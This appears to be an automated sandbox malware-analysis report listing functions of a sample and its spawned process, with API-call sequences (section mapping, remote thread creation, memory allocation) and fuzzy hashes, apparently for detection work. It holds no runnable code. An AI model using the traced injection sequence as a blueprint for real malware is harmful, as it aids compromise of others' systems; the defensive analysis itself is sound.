Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction ID: 77e294e5c29794052b934d18963121443c47762038f294bdc3221756e3d7f28a
Opcode Fuzzy Hash: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction Fuzzy Hash: 74512C71900209BFEF209F91CC49FEFBBB8EF85B00F104159F951AA2A5E7B09941CB24

Function 004014AD Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction ID: d83691bfaa908ebf768f39752e331a6567bad0fa9e9ed4c6933609491a97c617
Opcode Fuzzy Hash: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction Fuzzy Hash: 0B512B71900245BBEB209F91CC49FAF7BB8EF85B00F104129FA51BA2E5E6B49941CB64

Function 004014D5 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction ID: fd495a3767c54d0d9857a4c92bec852555a579275bcd6122a58bb2fbabb6e282
Opcode Fuzzy Hash: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction Fuzzy Hash: EF510A71900209BFEF209F91CC49FEFBBB8EF85B10F104159F911AA2A5E7B09941CB24

Function 00402F55 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403089
NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 385db6ec30348a4611532b2edd8baef849cc63295ecf85ab64ace8f86e30940b
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: D9413731218E098FD768EF6CA845B6277D1F798311F6643AAE809D3389EA34DC1183C5

Function 0064AC68 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0064AC90
Module32First.KERNEL32(00000000,00000224), ref: 0064ACB0

Memory Dump Source

Source File: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, Offset: 00638000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_638000_oZB7n3wuNk.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 4aa5c45356edc7bfd1841777032938d6ff15b3d0f83178ed083fe18b899096cd
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 42F09032240714BBD7603BF9A9CDBAE76EEBF49725F100628E642D21C0DB70EC454A62

Function 004030B2 Relevance: 1.6, APIs: 1, Instructions: 64
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction ID: 842373eb4463ac9e834e9e22d1360699520a6be1e431551352f4b65e49395860
Opcode Fuzzy Hash: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction Fuzzy Hash: BA018E3360D01556C71C9A7848012F56F56D784321F34413BE1566B5D7D63E8A0B5587

Function 007A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 007A024D

Strings

kernel32.dll, xrefs: 007A008F, 007A0095
cess, xrefs: 007A018D

Memory Dump Source

Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: cc6d5921154b78107d5c505add64502630adb7c0d8fbae98864914a037feabd1
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 4E528874A01229DFDB64CF68C984BA8BBB1BF09304F1485D9E80DAB351DB34AE94DF54

Function 007A0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,007A0223,?,?), ref: 007A0E19
SetErrorMode.KERNELBASE(00000000,?,?,007A0223,?,?), ref: 007A0E1E

Memory Dump Source

Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 60cb3f40b0b8b15a525da7d8e95f9786b204af80b7b2fad890f04ce13a54c87c
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 44D0123114512877DB003B94DC09BCD7B1CDF09B62F008411FB0DD9080C774994046E5

Function 00401869 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction ID: c749d285b2de24fc316c817c7ae4fe8e6badb8f794917fcf5296f62f9050bee9
Opcode Fuzzy Hash: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction Fuzzy Hash: BA117C72A0C208EBE600BA949C42E7A3259AB41755F348037BA07790F0D67D9B13B72B

Function 00401874 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction ID: b17aa293f10861f930621d71b3cc53cbab5e3b4d2edd5f2ed28ca100fb2eaa3d
Opcode Fuzzy Hash: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction Fuzzy Hash: 2C010472A0C245EBEB00ABA09C4297933659F00305F248477B606790F1D57D8712F71B

Function 00401894 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction ID: b8c0f1a70be89906461d65cd061911ad83e0312d7227b68f91b7eb194a97aeae
Opcode Fuzzy Hash: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction Fuzzy Hash: CA015A7260C205EBEB01AA909C42A7A3215AB45355F248437BA17790F1C67D8A53F71B

Function 0064A927 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0064A978

Memory Dump Source

Source File: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, Offset: 00638000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_638000_oZB7n3wuNk.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 5c9746cdfe595740576ce98cefe06f8a92bb7279f4a14d206e4ba7f77a62acd1
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 2D113C79A40208FFDB01DF98C985E98BBF5AF08350F058094FA489B362D371EA50DF85

Function 00401898 Relevance: 1.3, APIs: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction ID: be550ea8b7a21d6326383ffce51d2b737e5c9e0a4d996b68b29bd2ffee87f150
Opcode Fuzzy Hash: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction Fuzzy Hash: 32014F7260C205EBEB01AA909D41A7E3255AF45315F248437BA17790F1C67D8653F71B

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction ID: 2ebc05d28c21af2a54c4caf66b99915bed587d393384b69dc5fa06e125dea622
Opcode Fuzzy Hash: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction Fuzzy Hash: 50018F7260C205EBEB01AA909C41A7E3315AB45311F208437BA06790F1C67D8712F71B

Function 0040189C Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction ID: 055aca88afb56c34d21ecc05ae408393a65145e0cd4b89ba36dd333808a7ed44
Opcode Fuzzy Hash: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction Fuzzy Hash: C401627260C205EBEB01AA909D51A6E3355AF45351F208437BA16790F1C67D8652F71B

Non-executed Functions

Function 007A092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 007A09DC, 007A09DF, 007A09E4
., xrefs: 007A095F
l, xrefs: 007A0966

Memory Dump Source

Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 25832fa1444af66ef1e743b70733ccc99ec660d3ec924cc2d2e4fc63a549f9ad
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: C4318AB6900609CFEB10CF99C884AAEBBF9FF49324F24454AD841A7311D775EA45CFA4

Function 007A154D Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ef201b7eb768e6bc6555ba41f306de6eccaabbf2ee15fcfb797bfe8dfe952b
Instruction ID: 00aa4fa33964227ee3dc02f85a46043d3a2d6d664641a7a3abe33854cfa6e656
Opcode Fuzzy Hash: f3ef201b7eb768e6bc6555ba41f306de6eccaabbf2ee15fcfb797bfe8dfe952b
Instruction Fuzzy Hash: 092134728982409EDF959FB4C9870C27F72BE133387B007ECC0618B262CAA69113CB52

Function 0064A545 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, Offset: 00638000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_638000_oZB7n3wuNk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: e0c5cbf72aecf7d9416b0ac41df33178dc0324b0c199ca3d9e7d9fef97eac854
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: B1117072780100AFD744DE95DD91EA673EAEB88330B298165E904CB315E675EC02C760

Function 00401C0A Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction ID: ac47c9089ab74bbd4744f5430c59f4e61b9adfdf7c8bba648fb7bf2dae8000a3
Opcode Fuzzy Hash: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction Fuzzy Hash: 10115A2049D3C05BC3878B7CD595483BFA47D1B230B5A55EED8C24F963C394A925D3A3

Function 007A1C71 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction ID: 2c9ce2d070023683a66063f9f5ef25a42d674bd8abd2ac0316e7f96e4d8d34cf
Opcode Fuzzy Hash: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction Fuzzy Hash: AD11482049D3C05BD3838B7CD295483BF647E4B230B9A96EED8C14F913C345A915D3A3

Function 00401C5E Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction ID: c6b7842e347cac63059ed32f1a386f80ec7c31cd39de27a6132647ed699d03ea
Opcode Fuzzy Hash: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction Fuzzy Hash: BE019D0526E3D81AC3878B7DC1895877F017D5B13079BA2EEECC18E823C380884AC763

Function 007A1CC5 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction ID: c6b7842e347cac63059ed32f1a386f80ec7c31cd39de27a6132647ed699d03ea
Opcode Fuzzy Hash: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction Fuzzy Hash: BE019D0526E3D81AC3878B7DC1895877F017D5B13079BA2EEECC18E823C380884AC763

Function 007A0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: d5d320989883a75441cc4847dc7e3c057b311ac91c638186312ac6d0dcdec9a6
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 4801A277B016049FDF21DF64C804BAA33E5FBC7316F454AA9D90A97282E778AD418BD0

Analysis Process: birajciPID: 6596, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	117
Total number of Limit Nodes:	2

Executed Functions

Function 00401476 Relevance: 10.7, APIs: 7, Instructions: 228
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
Instruction ID: 2930413ebcf3c91ef78c7b899968c143e4494e66a1317453e42a44ae66849b54
Opcode Fuzzy Hash: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
Instruction Fuzzy Hash: AB7190B1900245AFEB209F51CC49F9FBBB8FF82710F10416AF951AB2E1E7719941CB64

Function 00401493 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction ID: d7c6057c418d322157b37bade1bff21ef7bff7238e112bc1c960839226febb51
Opcode Fuzzy Hash: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction Fuzzy Hash: 41616571900205FBEB209F91CC49FAF7BB8FF85710F10812AF952BA1E5D6B49901DB65

Function 004014AA Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_birajci.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction ID: 384a0da1d92476b1279baf81ca3941c4d16b4b8eb8340d8fd65a4e2b9f3dfa72
Opcode Fuzzy Hash: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction Fuzzy Hash: B6513D71A00205BFEF209F91CC49FAF7BB8EF85B00F104129F951BA2E5D6B49905CB64

Function 004014B1 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
